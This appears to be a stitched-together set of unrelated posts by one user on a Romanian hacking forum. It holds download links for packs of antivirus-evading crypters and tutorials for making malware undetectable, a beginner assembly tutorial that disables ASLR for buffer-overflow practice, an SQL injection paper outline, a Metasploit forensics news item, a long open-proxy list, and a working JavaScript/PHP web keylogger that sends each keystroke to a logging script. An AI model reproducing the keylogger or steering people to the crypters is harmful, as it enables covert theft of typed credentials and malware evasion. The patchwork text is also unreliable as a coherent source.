Nytro

RAR 1 01 - DarkAvengard Crypter (Open source Code Crypter > p0ke >> Moded) 02 - h4ck-y0u.org crypter by DuSTY 03 - L0rD Crypter by haZl0oh 04 - AT4RE aSm Protecter 1.0 by Mouradpr 05 - AverCryptor 1.02 beta by os1r1s 06 - Cryptic 2.1 by Tughack 07 - Crew Crypter by North-Team 08 - Mortal Team Crypter 2.0 by Ras 09 - NOmeR1 by NOmeR1 and P.S. 10 - Poly! Crypt 2.8 by BUNG 11 - PowerCrypt 2.0 by N47RON 12 - Private Krypt 1.0 beta by t0pP8uZz 13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer 14 - Russian Cryptor 1.0 by master3 15 - SimbiOZ 2.1 by Extranger 16 - Snoop Crypt by snoop 17 - Zelda Crypt by snoop 18 - WinOfCrypt 1.0 by DarkPressure 19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek 20 - X-Crypter 1.2 Private Version by x-zer0 RAR 2 01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source) 02 - Crypter v.3.1 by SLESH 2007 (Delphi source) 03 - FFC v.1.6 Public by Juza 04 - File Crypter Pro by Aphex (Delphi source) 05 - GKrpto v.1.0 by User-99 06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source) 07 - Open source file crypter (ass crypter) by assoftware (Delphi source) 08 - Pecrypt by archphase (Delphi source) 09 - Pscrambler v.1.2 by p0ke (Delphi source) 10 - Smokes Crypter v1.2 (Delphi source) 11 - Cigicigi File Crypter v1.0 by turkojan 12 - iPBProtect v0.1.5 beta [****] by Forgat 13 - MaskPE v.2.0 by yzkzero 14 - PEncrypt v.4.0 by JunkCode 15 - Perplex v.1.01dev by BliZZaRD 16 - SkD Undetectabler 2.0beta by skdrat 17 - ExeSax v.0.9.1 GUI 18 - VB-PE-Crypt 1.0 by Flo 19 - UnderGround Crypter v.1.0 by Booster2ooo 20 - Daemon Crypt v.2 Public by Evil_Inside RAR 3 01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC 02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC 03 - Vbsencrypter v.0.01 by K 04 - File Crypter by valdir_salguei ro (from brasil - source code included) 05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d 06 - iNF[CRYPT] by LESHIY & [nht] 07 - CryptoFilez v.2.0 by Mr.Ded 08 - Morphnah Beta2 by pyccxak.com Kas 09 - Pohernah v.1.0.2 by pyccxak.com Kas 10 - Pohernah v.1.0.3 by pyccxak.com Kas 11 - RPolyCrypt v.1.0b by Vasca 12 - StrAnGe CrYpTeR by TiPiaX (source code included) 13 - DalKrypt v1.0 by DalKiT (source code included) 14 - fEaRz Crypter v.1.0 beta1 by fEaRz 15 - Icrypt v.1.0 by BuGGz 16 - Minke v.1.0.1 by Codius 17 - Scramble Tool v0.2.3b By System33r (k0nsl) 18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1 19 - NoodleCrypt 2 by NoodleSpa 20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas All: Download: http://rs222.rapidshare.com/files/94316443/PackCrypters.rar

Ma mai gandesc. Cum ar fi daca in loc sa posteze cineva un program ar scrie: "Daca il vrea cineva sa imi dea add la plm_hackeru" sau ceva de genul? In fine, asta voi decide in functie de situatie.

Detalii? Spammer pe messenger? Sa trimita multe mesaje, sau sa te loghezi si sa dea mass, ceva de genul? Sau un fel de booter?

Ok guys im sure some people will agree with me here.These 3 tuts are by far the best i have ever seen on how to make whatever it is your trying ud undetected by quite a few av's. If you combine these techniques and learn how to do them correctly you could possibly make a program near fud or fud. Anyways these 3 tuts helped me allot and i thought id share them They also explain to you what to do very clearly and have links to the tools you need and also have pictures showing you what to do. So it isn't just any nooby tuts its professional ones The credits are at the beginning of the tuts when you open them. Please note that if anyone needs help with any of the tuts or don't understand some bits please just post it up and il get back to you as soon as possible Credits to Icarus Download: http://www.2shared.com/file/7090483/b58610b6/Pack.html

Assembly Language Basics Tutorial ------------------------------------- By Aro *Intro: Hey it's Aro and this is my first tutorial. In this basic assembly tutorial shows basics things you need to know. I had this Idea that there is other people like me who are still learning and want someone to learn with to I made this tutorial for people to learn along with me so we can all spread information. If anyone who knows about assembly please correct if there is anything wrong in my tutorial. I need feedback it will let me know what I need to do to be better. Hope you like it Aro. This tutorial contains the following information: *System Organization Basics *CPU *CPU Registers *Stack System Organization Basics: -------------------------------------------------------------------------------------------------- CPU (aka Central Processing Unit): ------------------------------------------------------------------------------------------------------ *Control Unit: Retrieve/Decode instructions,Retrieve / Storeage data in memory. *Execution Unit: Acually Exectution of instruction. *Register: Internal memory locations used as variables. *Flags: Used to indicate various "event" when exectution is happening. CPU Registers: ------------------------------------------------------------------------------------------------------------------------------------------------- Registers are internal memory locations used as variables. A register is 32 bits long or 4 bytes there are 8 registers. EAX, EBX, ECX, EDX, ESI, EDI, ESP, and EBP. The "E" in the beginning of all the registers indicates that it is a 32 bit register. General Purpose Registers -------------------------------------------------------------------------------------- *EAX (Accumulator Register) : General used for storing operands and result data *EBX (Base Register): Used for storing pointers to data. Only register that can be used as an index *ECX (Counter Register): Used for loop operations. *EDX (Data Register): Used as a input outup pointer. *ESI, EDI (Pointer)- Data Pointer Registers from memory operations, generally used for string operations. *ESP (Pointer): Stack Pointer Register. *EBP (Pointer): Stack Data Pointer Register. 32 bit registers can be split into 16 bit. In 16 bit programs only the lowest bits of the registers are used. They have the same names as general registers but without the "E" example: AX, EX, CX, DX, SI, DI, SP, BP. The 16 bit register can be spit into highbyte and lowbyte. example: EAX is 32 bit, AX is the lowest 16 bit of EAX and then the AX could be split into AH (highbyte) and AL (lowbyte) which are one byte in size. Segment Registers -------------------------------------------------------------------------------------- *CS (Code segment) - 16 bit number that points to a active code-segment *DS (Data segment) - 16 bit number that points to a active data-segment *SS (Stack segment - 16 bit number that points to a active stack-segment *ES (Extra segment) - 16 bit number that points to a active extra segment *EIP (32 bit intruction pointer) points to the instruction being done. *A control register is a processor register which changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control. Check http://en.wikipedia.org/wiki/Control_register for more information. Virtual Memory Model: Every process is laid out in the same virtual memory space, it doesn't matter what the the actual memory location. Every process that runs in the system seems like its running independently. There is a security feature in Linux 2.6 and higher that's called "randomize_va_space" this feature protects against Buffer Overflows. randomize_va_space uses space randomization if enabled to 1 (true), which is default to disable it change it to 0 (false). This will be helpful to practice on buffer overflows. If you have windows don't do this though I recommend you to get Linux such as Ubuntu (even a live CD) it would help if you really want to get good at this. But if you want to get a dissembler get NASM for windows. To disable the linux patch(Only do the stuff above if you want or going to practice doing buffer overflow attacks): cat/proc/sys/kernel/randomize_va_space echo 0 > /proc/sys/kernel/randomize_va_space cat /proc/sys/kernel/randomize_va_space Only do the stuff above if you want or going to practice doing buffer overflow attacks.^^^ Program Memory: -------------------------------------------------------------------------------------------- *The first segment is the .text segment. This segment cotains the actual program the execuable instructions are located here. *The second segment is the .data. This is where any data that has been initalized with a value is held. example: .data Int32: .int 2 *The third segment is the .bss. This is where unused data is held. example: .bss .comm Buffer, 1024 *The third segment is the heap. The heap is where the virtual memory space is located. *The fourth segment is just unused memory. *The firth segment is the Stack which is general used for storing function arguments and local variables. The stack is located in the highest memory location possible. It general goes down the memory from highest to lowest memory. The stack is last in first out data structure otherwise know as a LIFO (Last in First Out). The Stack ------------------------------------------------------------------------------------------------------------------------- As I said before. A stack is a temporary storage unit in computer memory where function arguments and local variables are stored. The LIFO Principle is last value you put in the first it comes out. Just imagine you have a stack of papers when I wanted my teach to correct my test first I would wait until everybody finished so when I put in my test on her desk I can sneak a peek on my score or how many red marks are on my test when she starts correcting it when we walk out of class. When you PUSH two values on the stack you will get the last one first because of that method. PUSH - pushes value on stack POP - removes from stack ESP - Points to stack Example of LIFO Principle REMEMBER MUST KNOW LIFO: Right here is a example of a stack. The ESP register holds 0x000008 which is the top of the stack. example: ESP 0x0000008 The stack adds a new value (0x0000007) and (0x0000006) using the PUSH operation. example: PUSH 0x0000007 PUSH 0x0000006 Now we update the ESP pointer to the top of the stack to the address 0x00000006. example: ESP 0x0000006 Now we use the POP operation to take that value of the stack. Which removes that last operation put into the stack (LIFO REMEMBER). example: POP 0x00000006 Next we have to update the ESP pointer to value 0x0000007. example: ESP 0x00000007 Next we have to POP the last first value we put in off the stack. (LIFO) example: POP 0x00000007 Finally we update the ESP pointer register to the top of the stack. example: ESP 0x0000008 Now I hope you understand the LIFO Principle if you don't, leave a question. Or Google.com its the best hacking site. If you don't understand or I explained something wrong leave a message. Someone who knows Assembly or I will hopefully answer. I'll write part two later. Please leave feed back good or bad. I don't care. I need to get better. Assembly Language Basics Tutorial Aro Out

E-Book Table of Contents [Abstract]...........................................................................................................................3 [Introduction].....................................................................................................................3 [Obtaining Information Using Error Messages].................................................................7 [Leveraging Further Access].............................................................................................12 [xp_cmdshell]...............................................................................................................12 [xp_regread]..................................................................................................................13 [Other Extended Stored Procedures]............................................................................13 [Linked Servers]............................................................................................................14 [Custom extended stored procedures]...........................................................................14 [Importing text files into tables]...................................................................................15 [Creating Text Files using BCP]...................................................................................15 [ActiveX automation scripts in SQL Server]................................................................15 [Stored Procedures]...........................................................................................................17 [Advanced SQL Injection]................................................................................................18 [Strings without quotes]................................................................................................18 [Second-Order SQL Injection]......................................................................................18 [Length Limits].............................................................................................................20 [Audit Evasion].............................................................................................................21 [Defences]........................................................................................................................21 [Input Validation]..........................................................................................................21 [SQL Server Lockdown]...............................................................................................23 [References].....................................................................................................................24 Appendix A - 'SQLCrack'.................................................................................................25 (sqlcrack.sql).................................................................................................................25 Download: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

Researchers will release an open source tool at Black Hat USA that helps forensics investigators reconstruct attacks that use a popular Metasploit payload to covers its tracks. Mandiant's Steve Davis and Peter Silberman have developed an "anti-" anti-forensics tool, of sorts, tentatively called the Metasploit Forensics Framework, which they'll demonstrate at the security conference later this month. The tool is aimed at unmasking what Metasploit's stealthy Meterpreter (PDF) did on a machine. Meterpreter lets developers write code in DLL files and execute everything in memory -- without writing anything to the victim machine's disk, where it could be detected and, in turn, complicate incident response. Meterpreter can be used to download and upload files, execute code, and open its own command shell, the researchers say. Their new tool can tell if a Meterpreter packet is still in memory, and, if so, which files Meterpreter has accessed, and whether it has modified a registry key. Some traditional antivirus tools can't detect Meterpreter-borne attacks because they never hit the disk, the researchers say. "You wouldn't see the attacks happen if they didn't write anything to disk," says Steve Davis, one of the researchers and a consultant with Mandiant. "We are going to show how we can reconstruct a crime scene in memory." The Metasploit Forensics Framework is a proof-of-concept tool that scans the processes in memory. "Meterpreter has unique packets...and we can identify those and reconstruct its processes," says Peter Silberman, an engineer on the product team at Mandiant. "We're going to discuss how Meterpreter looks in memory, and how it's able to circumvent traditional tools [for forensics]. We'll demonstrate how with some advanced knowledge, you can reconstruct what commands were sent to Meterpreter and perform an autopsy on an attack." Memory analysis in forensics has only begun to catch on tool-wise in the past year or so, the researchers say. Their tool helps investigators pull useful information from memory to help in their forensics work, they say. "This is just a small research project in how freed memory can still pull out a lot of useful information on the commands [an attacker] used," for example, Silberman says. The researchers say they fully expect the Metasploit developers to come up with a workaround for their tool in short order once it's released. They plan to make the tool available on Mandiant's Website the day of their Black Hat presentation so attendees can experiment with it during their talk, they say.

O sa ajungi un criminal... Ban!

Pot face eu un tool ceva, numai sa imi dati idei. A, si sa nu fie mult de munca la el, ma plictisesc repede.

Cat am mai cautat dupa unul functional... Cred ca merge bine. Download: http://www.freeproxy.ru/download/P_Checker.exe

Daca e cel care il stiu eu, nu imi place. Adica e veche faza cu macrourile. Si in 95% din cazuri nu o sa mearga. S-ar putea face multe daca ar merge...

Voi reincepe campania cu warningurile. Veti primi warning daca: - inviati un topic vechi fara rost - Uitati-va si voi la data ultimului post - postati ID-ul vostru - Discutiile se poarta pe forum - postat in categorii gresite - Ganditi putin inainte de a deschide un topic si selectati categoria potrivita. Toate cererile sunt la CERERI, nu la Programe Hack sau altundeva. De asemenea vechile motive pentru avertismente se pastreaza, in special offtopicul. La 3 warnuri ban o saptamana, depinde de starea in care ma aflu. Nu va convine ceva va dati cu curu de pamant.

Ban. Uitate la datele ultimelor posturi.

Download: http://www.2shared.com/file/7084370/1c5af5a1/BOF.html

114.127.246.36:8080 116.93.16.20:8080 118.40.95.240:3128 118.98.32.34:80 119.167.225.136:8080 121.163.166.63:8080 121.96.179.27:8080 124.207.168.48:808 125.141.225.11:3128 138.69.167.245:80 142.217.191.188:8080 146.83.8.31:8080 151.96.0.210:80 157.100.103.106:80 173.8.154.173:80 174.142.104.57:3128 174.143.236.197:80 187.5.20.236:6588 189.11.11.242:3128 189.14.68.130:6588 189.39.241.34:6588 189.42.253.18:6588 189.80.205.130:80 190.102.206.48:8080 190.216.31.219:8080 190.254.198.234:6588 192.192.169.234:80 193.109.167.174:3128 193.171.32.6:80 193.188.70.3:8080 193.252.53.103:80 194.100.9.12:80 194.224.243.11:80 194.44.144.2:80 194.44.144.3:80 195.139.235.200:80 195.154.158.18:80 195.155.232.37:2020 195.209.224.91:3128 195.220.226.230:80 195.229.62.157:8080 195.68.63.147:80 195.7.100.44:8080 196.12.36.225:80 196.44.187.21:80 200.107.15.58:80 200.124.202.96:8080 200.175.16.150:8080 200.201.193.156:80 200.204.62.49:6588 200.43.221.66:80 200.43.221.67:80 200.43.221.68:80 200.49.211.8:3128 200.55.208.203:80 200.65.127.161:3128 200.65.127.161:8083 200.74.156.108:8080 201.15.232.96:8080 201.17.162.45:8080 201.225.226.68:8080 201.243.184.186:8080 201.25.223.115:8000 201.36.173.80:6588 201.83.221.229:8080 202.143.155.44:80 202.3.217.125:8080 202.44.4.85:8081 202.54.61.99:8080 202.6.224.83:80 202.99.29.27:80 203.128.243.207:80 203.131.160.19:85 203.157.169.10:80 203.162.112.111:80 203.162.112.189:80 203.162.112.55:80 203.241.192.211:9090 203.67.172.47:8080 203.77.193.180:6588 206.219.83.3:80 206.230.106.206:80 207.216.60.69:9090 207.248.228.166:80 208.106.250.202:80 208.53.196.128:9090 208.96.213.149:80 209.123.56.110:80 209.47.251.243:80 210.155.201.169:8080 210.212.130.54:8090 210.5.71.130:8080 210.52.58.51:80 211.113.141.246:8080 211.138.198.7:10917 211.162.78.178:80 211.90.22.106:8088 212.102.0.104:80 212.103.139.75:80 212.116.137.248:3128 212.117.166.26:8125 212.138.84.62:8080 212.26.15.61:80 213.197.183.254:81 217.114.3.220:8080 217.117.111.230:81 217.160.106.224:80 217.218.98.1:80 217.73.17.173:80 217.97.150.119:8080 218.108.44.170:808 218.123.236.21:8080 218.182.86.20:8080 218.75.23.110:3128 218.75.75.133:80 219.101.104.30:8080 219.64.195.182:6588 219.94.142.25:80 220.118.81.84:3128 220.15.224.27:8080 220.28.176.137:8080 220.40.60.59:8080 221.120.211.2:8080 221.131.124.22:80 221.133.117.131:8000 221.204.253.154:8088 221.215.72.218:8080 222.215.23.110:80 222.242.188.170:8080 222.252.240.14:8080 222.41.10.70:1337 222.68.207.11:80 24.117.107.217:8085 24.127.136.205:9090 24.131.50.28:8085 24.174.245.45:8085 24.186.142.255:8085 24.186.144.126:8085 24.187.120.237:8085 24.187.13.217:8085 24.190.108.167:8085 24.190.229.111:8085 24.191.64.208:8085 24.213.104.62:9090 24.23.98.38:9090 24.34.60.207:9090 24.4.223.134:9090 24.45.120.136:8085 24.5.10.141:9090 24.90.159.67:8085 41.208.111.211:8080 58.30.227.5:3128 58.63.109.66:8080 59.159.236.8:80 59.162.33.158:8080 59.51.9.69:80 59.7.91.227:8080 59.77.6.183:808 60.18.168.172:8080 60.208.64.177:8088 60.49.225.107:8080 61.134.43.24:808 61.191.57.40:808 61.89.166.246:8080 62.159.143.172:80 62.212.83.40:80 62.217.43.115:8080 62.48.70.198:80 62.48.77.11:80 63.241.168.215:80 63.247.140.101:3128 64.188.199.135:9090 64.29.148.15:80 64.29.148.17:80 64.29.148.18:80 64.29.148.19:80 64.29.148.30:80 64.29.148.36:80 64.29.148.37:80 64.29.148.40:80 64.29.148.46:80 64.29.148.47:80 64.29.148.49:80 64.29.148.50:80 64.58.164.148:9090 64.94.90.22:80 65.188.251.247:9090 66.168.253.180:6588 66.176.214.64:8085 66.25.155.74:8085 67.175.133.15:9090 67.175.182.66:8085 67.202.13.157:8080 67.82.243.169:8085 67.86.193.238:8085 68.105.41.151:8085 68.12.200.120:9090 68.198.252.19:9090 68.35.192.87:8085 68.49.230.120:8085 68.60.169.74:8085 69.112.97.79:8085 69.114.251.90:8085 69.116.154.39:8085 69.116.204.103:8085 69.120.155.145:8085 69.120.194.149:8085 69.124.169.255:8085 69.125.36.135:8085 69.13.197.165:80 69.7.105.30:8080 70.117.246.169:8085 70.119.22.24:8085 70.119.52.5:8085 70.122.126.102:8085 70.125.105.1:8085 70.172.242.142:8085 70.172.252.133:9090 70.186.168.50:8085 70.189.133.202:8085 70.64.143.77:9090 70.64.147.32:8085 71.202.143.10:9090 71.229.43.217:8085 71.62.242.35:8085 72.167.113.31:80 72.167.181.9:80 72.183.10.174:9090 72.213.34.248:8085 72.29.94.55:80 74.192.158.221:9090 74.192.185.103:9090 74.194.62.39:9090 74.206.98.202:8080 75.101.188.125:80 75.125.212.61:8888 75.145.241.73:8080 75.183.58.26:8085 75.66.49.218:9090 75.93.151.23:9090 76.107.141.133:9090 76.111.54.219:9090 77.221.99.10:80 77.246.52.118:8080 77.37.132.88:8080 77.88.66.251:8000 77.93.197.83:80 78.187.19.95:8088 78.188.40.30:80 78.41.103.43:3128 79.160.177.10:8080 80.253.57.9:3128 80.94.82.55:1025 81.180.75.142:8080 82.145.197.249:8080 82.79.32.244:3128 83.161.199.75:80 83.242.184.210:3128 85.214.113.101:1113 85.249.168.94:3128 85.249.33.2:3128 85.93.134.139:8080 87.232.72.222:80 88.200.224.246:3128 88.208.219.155:8080 88.41.111.190:8080 88.87.129.118:8000 88.87.129.71:8000 89.212.135.232:9090 89.222.221.123:8080 89.96.143.130:8080 89.96.169.141:80 91.121.3.29:9090 91.121.85.162:80 91.200.235.231:3128 91.201.73.229:80 94.23.50.9:80 96.19.237.145:9090 98.129.203.119:80 98.156.116.192:8085 98.170.233.96:8085 98.181.57.227:9090 98.183.12.251:8085 98.216.226.252:8085 98.221.16.26:9090 98.222.175.19:8085 98.226.247.62:8085 98.227.14.54:9090 98.237.188.30:9090 98.243.16.115:8085 99.237.246.205:8085 99.250.211.177:9090 113.253.14.210:808 114.127.246.36:8080 116.93.16.20:8080 117.22.228.82:8080 119.167.225.136:8080 120.50.177.166:8080 121.8.191.34:3128 124.128.62.162:1080 124.207.102.87:80 124.207.168.48:808 124.82.221.194:8080 128.112.139.28:3127 128.213.48.25:80 128.42.142.41:3124 140.134.131.109:9797 142.217.191.188:8080 146.83.8.31:8080 151.96.0.210:80 168.10.168.61:80 174.142.104.57:3128 174.143.236.197:80 187.5.20.236:6588 189.19.35.194:6588 189.42.253.18:6588 189.43.254.194:6588 189.89.71.116:6588 190.102.206.48:8080 190.153.90.114:80 190.158.230.39:80 190.254.198.234:6588 192.192.169.234:80 193.109.167.174:3128 193.188.70.3:8080 193.220.51.25:3128 193.28.46.52:80 194.108.93.13:8080 194.108.93.14:8080 194.44.144.3:80 194.63.181.181:80 195.139.235.200:80 195.154.158.18:80 195.209.224.91:3128 195.220.226.230:80 195.229.62.157:8080 196.12.36.225:80 196.44.187.21:80 199.193.13.202:80 200.107.15.58:80 200.129.25.3:8080 200.153.113.34:8080 200.161.44.243:6588 200.171.232.140:6588 200.175.16.150:8080 200.201.193.156:80 200.232.115.145:3128 200.31.42.3:80 200.49.211.8:3128 200.51.203.200:80 200.65.127.161:3128 200.65.127.161:8083 201.17.162.45:8080 201.201.188.214:80 201.225.226.68:8080 201.25.223.115:8000 201.27.18.138:6588 201.92.253.33:3128 202.103.207.224:808 202.143.155.44:80 202.171.42.7:3128 202.213.246.61:80 202.3.217.125:8080 202.44.4.85:8081 202.54.61.99:8080 202.6.224.83:80 202.70.249.65:8080 202.99.29.27:80 203.110.245.250:80 203.157.169.10:80 203.162.112.51:80 203.162.112.75:80 203.186.108.130:65208 203.241.192.211:9090 203.89.25.61:80 204.131.46.200:8000 206.219.83.3:80 206.230.106.206:80 206.64.92.16:8000 207.192.227.94:8085 207.216.60.69:9090 207.248.228.166:80 208.106.250.202:80 208.96.213.149:80 209.47.251.243:80 210.155.201.169:8080 210.194.111.107:8080 210.212.130.54:8090 210.5.71.130:8080 210.52.58.51:80 210.6.251.216:808 211.113.141.246:8080 211.141.86.152:8080 211.90.22.106:8088 212.102.0.104:80 212.103.139.75:80 212.116.137.248:3128 212.138.84.62:8080 212.26.15.61:80 213.137.131.251:8080 213.195.224.169:3128 213.197.183.254:81 213.47.49.99:9090 213.61.56.178:80 213.82.91.94:80 216.157.74.73:80 217.160.106.224:80 217.218.98.1:80 217.218.98.3:80 218.108.44.170:808 218.111.102.66:3128 218.127.146.36:8080 218.204.251.131:8090 218.216.201.45:8080 218.252.41.203:80 218.75.75.133:80 219.131.223.122:3128 219.198.208.140:8080 219.58.72.191:8080 219.94.142.25:80 220.128.122.187:80 220.15.224.27:8080 220.19.164.19:8080 220.40.60.59:8080 220.66.203.5:80 221.116.142.90:80 221.12.147.80:808 221.120.211.2:8080 221.204.253.154:8088 221.214.27.252:808 221.215.72.218:8080 222.252.240.14:8080 222.68.206.11:80 222.68.207.11:80 24.1.162.44:9090 24.11.22.240:9090 24.117.107.217:8085 24.118.114.115:8085 24.12.99.61:9090 24.127.136.205:9090 24.131.50.28:8085 24.186.142.255:8085 24.186.144.126:8085 24.187.13.217:8085 24.190.108.167:8085 24.190.229.111:8085 24.191.64.208:8085 24.208.255.189:8085 24.213.104.62:9090 24.23.98.38:9090 24.34.60.207:9090 24.4.223.134:9090 24.45.120.136:8085 24.5.10.141:9090 24.92.73.109:9090 41.208.111.211:8080 58.211.212.78:808 59.162.33.158:8080 59.7.91.227:8080 59.77.6.183:808 60.208.64.177:8088 60.208.64.178:8088 60.247.2.241:8080 61.135.227.67:80 61.159.214.215:808 62.175.249.249:80 62.175.249.254:80 62.212.83.40:80 62.48.70.198:80 62.48.70.220:80 62.48.77.11:80 62.49.191.253:80 63.241.168.215:80 64.130.166.208:8085 64.201.65.21:8080 64.29.148.18:80 64.29.148.19:80 64.29.148.20:80 64.29.148.28:80 64.29.148.30:80 64.29.148.36:80 64.29.148.40:80 64.29.148.46:80 64.29.148.47:80 64.29.148.49:80 64.29.148.50:80 64.94.90.22:80 65.28.80.48:9090 65.65.219.98:29122 66.166.1.181:8000 66.168.20.67:8085 66.168.253.180:6588 66.199.247.42:6649 66.25.155.74:8085 66.25.162.152:8085 66.31.202.132:8085 66.55.8.51:13401 67.164.198.58:9090 67.166.225.236:8085 67.175.182.66:8085 67.184.220.218:8085 67.48.22.73:9090 67.81.234.34:8085 67.82.243.169:8085 68.103.16.107:9090 68.105.41.151:8085 68.11.182.111:9090 68.198.252.19:9090 68.38.209.46:9090 68.49.230.120:8085 68.60.169.74:8085 68.83.4.74:8080 69.112.167.111:8085 69.112.97.79:8085 69.114.251.90:8085 69.116.204.103:8085 69.120.155.145:8085 69.121.252.197:8085 69.124.169.255:8085 69.125.36.135:8085 69.13.197.165:80 69.7.105.30:8080 70.119.22.24:8085 70.125.105.1:8085 70.172.242.142:8085 70.186.166.112:8085 70.186.168.50:8085 70.189.133.202:8085 70.64.143.77:9090 70.64.147.32:8085 70.81.89.225:8008 71.192.196.210:9090 71.229.43.217:8085 71.62.242.35:8085 72.167.113.31:80 72.167.181.9:80 72.174.104.69:8080 72.183.10.174:9090 72.214.91.6:8008 74.206.98.202:8080 75.101.188.125:80 75.145.241.73:8080 75.66.26.190:9090 76.111.54.219:9090 76.120.225.210:9090 76.169.165.101:9090 77.101.6.178:9090 77.104.223.169:8080 77.221.99.10:80 77.246.52.118:8080 77.88.66.251:8000 78.188.40.30:80 79.160.177.10:8080 80.240.203.122:8080 80.25.23.207:8080 80.253.57.9:3128 80.6.61.196:9090 80.93.119.6:80 81.180.75.142:8080 82.145.197.249:8080 82.150.165.146:8080 82.79.32.244:3128 83.161.199.75:80 83.242.184.210:3128 83.96.39.196:80 84.253.13.230:3128 85.141.21.74:3128 85.214.113.101:1113 85.93.134.139:8080 88.191.17.209:443 88.41.111.190:8080 88.87.129.71:8000 89.222.221.123:8080 89.96.169.141:80 91.112.157.214:8080 91.121.85.162:80 91.200.235.231:3128 96.19.237.145:9090 97.74.115.75:80 98.129.203.119:80 98.156.116.192:8085 98.183.12.251:8085 98.221.16.26:9090 98.239.51.193:80 98.243.16.115:8085 98.251.71.196:9090

By reiluke kl.js function GetCandy(event) { var kreiluke = “”; var isNetscape = (navigator.appName.indexOf(”Netscape”) != -1); var kreiluke = (isNetscape) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode); makeRequest(’kl.php?iambr=’ + kreiluke); } function makeRequest(url) { var httpRequest; if (window.XMLHttpRequest) { // Mozilla, Safari, … httpRequest = new XMLHttpRequest(); if (httpRequest.overrideMimeType) { httpRequest.overrideMimeType(’text/xml’); } } else if (window.ActiveXObject) { // IE try { httpRequest = new ActiveXObject(”Msxml2.XMLHTTP”); } catch (e) { try { httpRequest = new ActiveXObject(”Mcft.XMLHTTP”); } catch (e) {} } } if (!httpRequest) { alert(’Giving up Cannot create an XMLHTTP instance’); return false; } httpRequest.onreadystatechange = function() { alertContents(httpRequest); }; httpRequest.open(’GET’, url, true); httpRequest.send(null); } function alertContents(httpRequest) { if (httpRequest.readyState == 4) { if (httpRequest.status == 200) { } else { alert(’There was a problem with the request.’); } } } kl.php <?php $_GET[’iambr’]; $file = fopen($_SERVER[’REMOTE_ADDR’] . “-logged.txt”,”a”); fwrite($file,$_GET[’iambr’]); fclose($file); ?> testpage.html <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”> <html> <head> <SCRIPT language=”JavaScript” SRC=”kl.js”></SCRIPT> </head> <body onkeyup=”GetCandy(event)”> <p>press a ~censored~ key at it will be logged</p> </body> </html>

Changes: *AJAX rendering techniques *Browser compliance! designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari *The code is smaller, I made it too big of useless stuffs in 2.0 *The javascript does no more act on the page loading time if the source feed is offline or timeout, simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer. *PHP proxy (this is optional, see post #2 in this thread) What is it: This is a simple javascript code wich you can copy and paste on your website to stay informed about the various public exploits, I have started building it 2 years ago from a basic code made by sophos, then with str0ke's cooperation I have got the idea to port it for milw0rm, rewriting it with AJAX styles, and that's what it is now. I think I won't update it much because it is now perfectly running, maybe a few minor updates to enhance the browsers compatibilities. How to use it: The code below is the sample code for the remote exploits section in milw0rm, if you would like to display other sections like dos, local, webapps, just change the configuration settings in the header of the code and replace all occurences of milalerts1 to the milalerts# defined for each sections, you should know that they are defined like this on milw0rm.com: remote exploits = milalerts1 local exploits = milalerts2 webapps exploits = milalerts3 dos exploits = milalerts4 You must have only 10 occurences to change, with a quick editor that's fast to achieve. //update: I have forgot to mention, if you would like to display several milw0rm modules on a same web page, you must think to rename all occurences of _Module1 to _Module# where # is a unique number from 2 to 4 for example, this will work around some functions that could be mixed between each modules. Code: PHP Code: <script type="text/javascript"> // Layout settings var feed_Module1 = 'http://milw0rm.com/js/3.0/remote.php' // news url var table_border_Module1 = '0' // table border size (default:0) var table_width_Module1 = '175' // table width, in % or px (default:100%) var table_cspacing_Module1 = '1' // table cellspacing (default:1) var table_cpadding_Module1 = '0' // table cellpadding (default:0) var table_bgcolour_Module1 = '#000000' // table background colour (default:#000000) var table_bdcolour_Module1 = '#000000' // table border colour (default:#000000) var table_bgpic_Module1 = '' // table background picture (default:none) var table_align_Module1 = 'left' // table horizontal alignement, LEFT | RIGHT (default:left) var table_hspace_Module1 = '0' // table horizontal space (default:0) var table_vspace_Module1 = '0' // table vertical space (default:0) var table_height_Module1 = '0' // table height (default:0) var header_align_Module1 = 'left' // header horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left) var header_valign_Module1 = '' // header vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var header_height_Module1 = '0' // header height (default:0) var header_bgcolour_Module1 = '#000000' // header background colour (default:#000000) var header_tcolour_Module1 = '#FFFFFF' // header text colour (default:#FFFFFF) var header_ttheme_Module1 = '' // header text theme (default:Eras Medium ITC) var header_tsize_Module1 = '1' // header text size (default:0) var header_title1_Module1 = 'remote exploits' // header plural title var header_title2_Module1 = 'remote exploit' // header singular title var column1_align_Module1 = 'center' // column1 alignement, LEFT | CENTER | MIDDLE | RIGHT (default:center) var column1_valign_Module1 = '' // column1 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var column1_height_Module1 = '0' // column1 height (default:0) var column1_bgcolour_Module1 = '#918484' // column1 background colour (default:#918484) var column1_tcolour_Module1 = '#000000' // column1 text colour (default:#000000) var column1_ttheme_Module1 = '' // column1 text theme (default:Arial Narrow) var column1_tsize_Module1 = '1' // column1 text size (default:0) var column2_width_Module1 = '' // column2 width, in % or px (default:90%) var column2_align_Module1 = 'left' // column2 horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left) var column2_valign_Module1 = '' // column2 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var column2_height_Module1 = '0' // column2 height (default:0) var column2_bgcolour_Module1 = '#004000' // column2 background colour (default:#004000) var column2_tcolour_Module1 = '#00C000' // column2 text colour (default:#00C000) var 